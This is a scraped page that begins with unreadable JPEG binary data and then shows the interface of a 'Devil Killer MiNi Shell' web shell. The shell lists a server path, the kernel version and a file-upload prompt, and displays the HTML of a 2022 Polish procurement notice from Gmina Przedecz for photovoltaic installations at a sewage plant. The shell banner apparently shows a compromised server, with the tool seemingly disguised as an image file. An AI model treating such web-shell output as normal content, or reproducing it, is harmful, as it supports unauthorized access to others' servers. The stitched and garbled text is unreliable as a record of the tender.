JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220412/0011833101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa dwóch instalacji fotowoltaicznych o łącznej mocy <br/>59 kW na potrzeby Oczyszczalni Ścieków w Przedczu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PRZEDECZ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 311019326</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Wolności 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przedecz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-635</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@przedecz.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.przedecz.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa dwóch instalacji fotowoltaicznych o łącznej mocy <br/>59 kW na potrzeby Oczyszczalni Ścieków w Przedczu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1224d4dd-ba26-11ec-9f44-6e63702cb2f7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00118331</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00033004/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa dwóch instalacji fotowoltaicznych o łacznej mocy 59 kW na potrzeby oczyszczalni ścieków w Przedczu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/przedecz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/przedecz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Osobami uprawnionymi do kontaktu<br/>z Wykonawcami są osoby wymienione w SWZ, Rozdział I.3. pt. KOMUNIKACJA W POSTĘPOWANIU.<br/>2) Postępowanie prowadzone jest w języku polskim za pośrednictwem platformazakupowa.pl pod adresem :<br/>https://platformazakupowa.pl/pn/przedecz<br/>3) W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między zamawiającym a wykonawcami w zakresie:<br/>- przesyłania Zamawiającemu pytań do treści SWZ;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia podmiotowych środków dowodowych;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia/poprawienia/uzupełnienia oświadczenia, o którym mowa w art.<br/>125 ust. 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dotyczących treści oświadczenia, o którym mowa w<br/>art. 125 ust. 1 lub złożonych podmiotowych środków dowodowych lub innych dokumentów lub oświadczeń składanych w<br/>postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dot. treści przedmiotowych środków dowodowych;<br/>- przesłania odpowiedzi na inne wezwania Zamawiającego wynikające z ustawy - Prawo zamówień publicznych;<br/>- przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>- przesyłania odwołania/inne<br/>odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się<br/>komunikat, że wiadomość została wysłana do zamawiającego.<br/>4) Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące<br/>odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na<br/>platformie<br/>w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie<br/>przekazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>5) Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów<br/>i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec<br/>awarii lub powiadomienie może trafić do folderu SPAM.<br/>6) Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu<br/>o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo -<br/>aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Pozostałe informację zawarte są w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą<br/>przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informujemy, że:<br/>• Administratorem Pani/Pana danych osobowych jest Burmistrz Miasta i Gminy Przedecz, Plac Wolności 1, 62-635 Przedecz;<br/>• Administrator wyznaczył Inspektora ochrony danych osobowych w Gminie Przedecz.<br/>W sprawie pytań dotyczących sposobu i zakresu przetwarzania Pani/Pana danych osobowych oraz przysługujących Pani/Panu<br/>uprawnień, może się Pani/Pan skontaktować się z Inspektorem Ochrony Danych się poprzez e-mail: mienie2@przedecz.com.pl<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego nr RGWI.271.1.3.2022 pn. „Budowa dwóch instalacji fotowoltaicznych o łącznej mocy 59 kW na<br/>potrzeby Oczyszczalni Ścieków w Przedczu” prowadzonym w trybie podstawowym bez negocjacji, na podstawie art.275 pkt 1<br/>ustawy Pzp.<br/>3. W związku z przetwarzaniem danych w celu, o którym mowa w ust. 16.2. odbiorcami Pani /Pana danych osobowych mogą być:<br/>1) podmioty uprawnione do tego na podstawie przepisów prawa;<br/>2) podmioty, które na podstawie stosownych umów podpisanych z Zamawiającym są współadministratorami danych osobowych lub<br/>przetwarzają w imieniu Zmawiającego dane osobowe ,jako podmioty przetwarzające;<br/>3) osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp.<br/>4. Zamawiający nie ma zamiaru przekazywać Pani/Pana danych osobowych do państwa trzeciego lub organizacji<br/>międzynarodowych.<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp. przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisanych ustawy Pzp związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO.<br/>Pozostałe informacje znajdują się w SWZ postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGWI.271.1.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1.	Przedmiotem zamówienia jest Budowa dwóch instalacji fotowoltaicznych o łącznej mocy 59 kW na potrzeby Oczyszczalni Ścieków w Przedczu. <br/>Adres inwestycji : Przedsięwzięcie realizowane będzie na działkach nr 29, 45, 46, 34, 35, 36, 37 oraz działkach 33 i 38 obręb 0001 Przedecz jednostka ewidencyjna: 300911_4 Gmina Przedecz 62-635 Przedecz.<br/>CPV: 09331200-0; 09332000-5; 45261215-4; 45233220-7<br/><br/>Opis przedmiotu zamówienia:<br/><br/>Przedmiot zamówienia pn. Budowa dwóch instalacji fotowoltaicznych o łącznej mocy <br/>59 kW na potrzeby Oczyszczalni Ścieków w Przedczu obejmuje: <br/>- przygotowanie terenu,<br/>- wykonanie przyłączy,<br/>- zakup i montaż paneli fotowoltaicznych wraz z oprzyrządowaniem i oprogramowaniem.<br/>- uzyskanie mocy z jednej instalacji minimum 29,5 kWp. Łącznie z dwóch instalacji uzyskana moc musi wynosić minimum 59 kWp i maksimum 59,9 kWp na i będzie przeznaczona na potrzeby funkcjonowania Oczyszczalni Ścieków, <br/>- zakup i montaż monitoringu, <br/>- modernizację oświetlenia i ogrodzenia terenu.<br/>Szczegółowy opis przedmiotu zamówienia:<br/>I.	Dwie Instalacje fotowoltaiczne o łącznej mocy 59 kWp:<br/>1.	Wykonanie dwóch kompletnych, odrębnych Instalacji fotowoltaicznych o mocy docelowej minimum 29,5 kWp każda. Instalacje należy zamontować na gruncie na wskazanych <br/>w dokumentacji lokalizacjach, na odpowiednich stelażach dedykowanych pod instalacje fotowoltaiczne. Jako źródło energii odnawialnej zastosowane w obydwu instalacjach zostaną moduły fotowoltaiczne monokrystaliczne o mocy minimum 500 Wp każdy. Zamówienie obejmuje wykonanie przedmiotowych instalacji zgodnie z obowiązującymi przepisami i normami w tym zakresie. Instalacje obejmują w szczególności: dobór i montaż modułów paneli fotowoltaicznych, konstrukcji, minimum dwóch falowników, przewodów, połączeń kablowych, zabezpieczeń i pozostałych elementów wchodzących w skład kompletnej instalacji PV, dwa odrębne podłączenia do sieci energetycznej do dwóch odrębnych liczników, zgłoszenie zakończenia i odbioru instalacji w Zakładzie Energetycznym, wykonanie dokumentacji powykonawczej oraz wszystkie wymagane prawem uzgodnienia i pozwolenia. W zakres zadania wchodzi uruchomienie Instalacji <br/>i uzyskanie niezbędnych dokumentów umożliwiających użytkowanie Instalacji.<br/>Zadanie obejmuje także dostawę oraz instalację i konfigurację systemu monitoringu instalacji fotowoltaicznych, dzięki któremu możliwe będzie kontrolowanie funkcjonowania instalacji i podawanie wyników pracy instalacji.<br/>Wymagane minimalne warunki gwarancji dla każdej Instalacji:<br/> – Panele fotowoltaiczne– gwarancja producenta minimum 10 lat na produkt, gwarancja sprawności po pierwszym roku pracy w wysokości min. 97% mocy nominalnej, gwarancja rocznego spadku mocy nie większego niż 0,6%. Gwarancja wydajności na moc powyżej 80 % mocy wyjściowej– minimum 25 lat. <br/>- Gwarancja - minimum 36 miesięcy na prace montażowe.<br/>- Inwerter/ falownik - gwarancja producenta minimum 10 lat na produkt i gwarancja minimum 36 miesięcy na prace montażowe,<br/>- Zabezpieczenie przyłącza - gwarancja na prace montażowe minimum 36 miesięcy,<br/>- Przewód przyłączeniowy - gwarancja na prace montażowe minimum 36 miesięcy,<br/>- System montażowy i konstrukcja- gwarancja na system montażowy i konstrukcję minimum 12 lat oraz gwarancja na prace montażowe minimum 36 miesięcy,<br/>- Budowa łącza instalacji PV- gwarancja na prace montażowe minimum 36 miesięcy.<br/><br/>Zamawiający informuje, że opomiarowanie energii na oczyszczalni ścieków odbywa się za pomocą dwóch odrębnych liczników (przyłączy):<br/>Moc przyłączeniowa przyłącza nr 1 - 30 kW<br/>Moc przyłączeniowa przyłącza nr 2 - 32,5 kW<br/>Instalacje fotowoltaiczne będą wytwarzać energię przeznaczoną na potrzeby funkcjonowania obiektu Oczyszczalni Ścieków. Projekt zakłada podłączenie odrębnie każdej instalacji do licznika jej przypisanego. <br/><br/>II.	Przygotowanie terenu pod budowę instalacji - Droga dojazdowa do instalacji fotowoltaicznych na terenie oczyszczalni ścieków: <br/>1. Wykonanie przebudowy uszkodzonego przepustu ø 40 pod drogą dojazdową do instalacji fotowoltaicznych na terenie oczyszczalni ścieków. <br/>2. Wykonanie remontu uszkodzonej nawierzchni asfaltowej na drodze dojazdowej <br/>do instalacji fotowoltaicznych na terenie oczyszczalni ścieków. <br/>3. Odnowę nawierzchni asfaltowej poprzez ułożenie warstwy ścieralnej gr 5 cm z betonu asfaltowego AC 8S. <br/>4. Wykonanie uzupełnienia (umocnienia) poboczy warstwą kruszywa naturalnego 0,075/32 mm (pospółka) stabilizowanego mechanicznie – warstwa o średniej grubości 5 cm na drodze dojazdowej do instalacji fotowoltaicznych na terenie oczyszczalni ścieków. <br/>5. Oczyszczenie i odmulenie rowu przydrożnego służącego do odwodnienia dróg do instalacji fotowoltaicznych na terenie oczyszczalni ścieków. <br/>6. Zamontowanie szlabanu w km 0+004 ograniczającego wjazd nieuprawnionych pojazdów na teren instalacji fotowoltaicznych zlokalizowanych na oczyszczalni ścieków. <br/><br/>III.	Przygotowanie terenu pod budowę instalacji - Drogi wewnętrzne do zapewnienia dostępności do instalacji fotowoltaicznych na terenie oczyszczalni ścieków: <br/>1. Wykonanie wyrównania istniejącej nawierzchni asfaltowej z nadaniem spadku nawierzchni w kierunku istniejącego rowu. (miejsce oznaczono na planie sytuacyjnym ). <br/>2. Odnowę nawierzchni asfaltowej poprzez ułożenie warstwy ścieralnej gr 5 cm z betonu asfaltowego AC 8S. <br/>3. Przebrukowanie nawierzchni chodnika z betonowej kostki brukowej przy budynku socjalno-warsztatowym na terenie instalacji fotowoltaicznych na oczyszczalni ścieków - chodnik zaniżony po ułożeniu nawierzchni asfaltowej. <br/>4. Humusowanie terenu z obsianiem trawą przy grub. warstwy humusu 5 – 10 cm <br/><br/>IV.	Pozostałe prace konieczne do wykonania w ramach realizacji przedmiotu zamówienia i ujęcia w kosztorysie ofertowym a nie ujęte w przedmiarach robót stanowiących Załącznik nr 11 do SWZ:<br/>1.	Montaż 3 opraw oświetleniowych punktowych o mocy maksymalnie 40 W każda na istniejących słupach oświetleniowych. Zadanie obejmuje także przeniesienie jednego słupa oświetleniowego z okablowaniem z ronda w okolice budynku na terenie Oczyszczalni. Odległość ok. 25 mb.<br/>Oprawy oświetleniowe typu LED o charakterystyce ulicznej muszą charakteryzować się parametrami nie gorszymi niż:<br/>1) Oprawy winny posiadać II klasę ochronności,<br/>2) Oprawy winny być w kolorze ciemno szarym lub grafitowym,<br/>3) Obudowy opraw winny być wykonane jako ciśnieniowy odlew aluminiowy,<br/>4) Stopień ochrony przed wnikaniem pyłu i wody dla opraw nie mniejszy niż IP66,<br/>5) Klosz opraw wykonany z hartowanego szkła,<br/>6) Odporność opraw na udary na poziomie nie mniejszym niż IK09<br/>7) Oprawy winny być wyposażone w zewnętrzny radiator rozpraszający ciepło emitowane przez diody LED, którego konstrukcja umożliwi swobodne odprowadzanie wody i brudu osadzającego się na oprawie - dopuszcza się tylko rozwiązania z chłodzeniem pasywnym,<br/>8) Uchwyt mocujący oprawy powinien umożliwiać montaż oprawy na słupie lub wysięgniku o średnicy od 42mm do 60mm oraz regulację pochylenia oprawy w zakresie niemniejszym niż od -10° do +10°,<br/>9) Oprawy powinny posiadać trwałość użytkową co najmniej 100 000 godzin pracy, przy zachowaniu strumienia świetlnego na poziomie nie mniejszym niż 90% strumienia nominalnego (L90),<br/>10) Oprawy winny umożliwiać dostęp do ich wnętrza bez użycia narzędzi, nie dopuszcza się stosowania śrub z nakrętkami motylkowymi itp. wszelkie elementy służące do zamykania opraw winny być wykonane ze stali nierdzewnej lub materiału z którego wykonany jest korpus oprawy, dopuszcza się zastosowanie śrub ze stali nierdzewnej ale zlokalizowanych od dołu oprawy tak aby uniemożliwić gromadzenie się wody lub zanieczyszczeń,<br/>11) Minimalny zakres temperatury otoczenia pracy opraw od -30°C do +35°C,<br/>12) Zasilacze opraw oraz panele LED winny być wyposażone w czujniki termiczne zabezpieczające zasilacz oraz panel LED przed przegrzaniem,<br/>13) Panele LED opraw winny być wyposażone w kostki przyłączeniowe, które w razie awarii powinny umożliwiać ich szybką wymianę,<br/>14) Panele LED winny być wyposażone w czujniki termiczne zabezpieczające panele przed przegrzaniem,<br/>15) Wszystkie elementy oprawy między innymi: zasilacze, moduły zabezpieczeń przeciwprzepięciowych, elementy pozwalające na komunikację oprawy z systemem zarządzania, winny być zintegrowane z oprawą,<br/>16) Ochrona przed przepięciami minimum 6kV,<br/>17) Wszystkie oprawy uliczne montowane w ramach przedmiotu umowy winny pochodzić od jednego producenta z jednej rodziny/serii opraw tzn. muszą być tego samego typu, dopuszcza się zróżnicowanie wielkości opraw wynikającą z ich różnej mocy.<br/>18) Oprawy należy zasilić przewodami typu YKY2x2,5mm2 450/750V.<br/>19) Załączanie opraw za pomocą czujników zmierzchu.<br/>2.	Dostawa i montaż systemu monitoringu wizyjnego z 1 kamerą z wykonaniem schematu instalacji. Zainstalowany system monitoringu wizyjnego ma zapewnić ochronę obiektu poprzez ciągły zapis obrazu z kamery przemysłowej obejmującej swym zasięgiem instalacje fotowoltaiczne. Zapis obrazu powinien być możliwy również w momencie zaniku napięcia ze stałej linii energetycznej. Obraz z kamery zapisany na dysku rejestratora powinien być archiwizowany przez minimum 14 dni. Urządzenie zamontowane w ramach systemu monitoringu nie musi posiadać dostępu do Internetu.<br/>Uwaga ! Zamawiający informuje, że „Budowa dwóch instalacji fotowoltaicznych o łącznej mocy 59 kW na potrzeby Oczyszczalni Ścieków w Przedczu” będzie prowadzona na terenie funkcjonującego Obiektu, gdzie na co dzień prowadzona jest działalność oczyszczania ścieków. Na terenie obiektu w trakcie prac będą przebywać <br/>i przemieszczać się pracownicy, wobec czego należy tak dostosować prace, zabezpieczenie terenu, oznaczenie terenu budowy z zachowaniem ciągów komunikacyjnych, aby zapewnić bezpieczeństwo wszystkich osób przebywających na terenie Oczyszczalni Ścieków. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09331200-0 - Słoneczne moduły fotoelektryczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na 